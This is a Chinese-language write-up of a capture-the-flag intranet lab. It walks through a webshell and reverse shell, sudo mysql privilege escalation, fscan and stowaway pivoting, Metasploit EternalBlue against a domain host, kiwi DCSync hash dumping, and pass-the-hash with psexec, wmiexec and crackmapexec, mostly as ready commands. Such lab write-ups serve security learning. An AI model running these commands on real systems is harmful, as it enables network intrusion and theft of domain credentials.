这个靶机比较特殊 他是由三部分的flag组成一个完整的flag
漏洞都给扫出来了 直接去打就行了
直接去写马 然后反弹shell
然后sudo -l 发现了这个mysql可以利用来提权
上传个fscan扫一下内网
整理一下信息
172.22.1.2 DC域控主机
172.22.1.15 外网主机 getshell
172.22.1.18 3306 OA系统
172.22.1.21 域内主机 MS17 永恒之蓝
先给这个linux主机上msf先
成功上线
然后去使用stowaway挂个代理
既然说这个21这个台主机存在MS17
这里的话我是用kali下的msf打的 服务器上的话不知道为啥老是失败
1 2 3 4 5 proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid //这个是个关键了 可以配合proxychains4本地使用 set RHOSTS 172.22.1.21 exploit
如果要是再服务器上用的话要加上route add xxxx
成功上线这台域内主机 还是system权限
然后上传个sharphound.exe
进去分析一下域内环境
发现这个机器对域控有DCSync权限 于是我们导出域内所有人的hash值
1 2 load kiwi kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
拿到了域管的hash值 那么直接pth攻击
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 hash传递攻击的几种方法 (其原理都是使用smb服务来进行攻击) psexec.py proxychains4 python psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2 -hashes: 域管hash值 dscyn获取 xiaorang.lab 域名 administrator 域管账户 172.22.1.2 域控账户 wmiexec.py proxychains4 python wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2 crackmapexec (这种是不能进入shell命令行的 ) proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" impacket-wmiexec proxychains4 impacket-wmiexec xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8
这就是使用pth攻击的几种方法 这里就打完了 拿着域管的hash去登录另一台机器就行了 (OA)
(上面工具原理就是基于这个SMB服务 445端口 )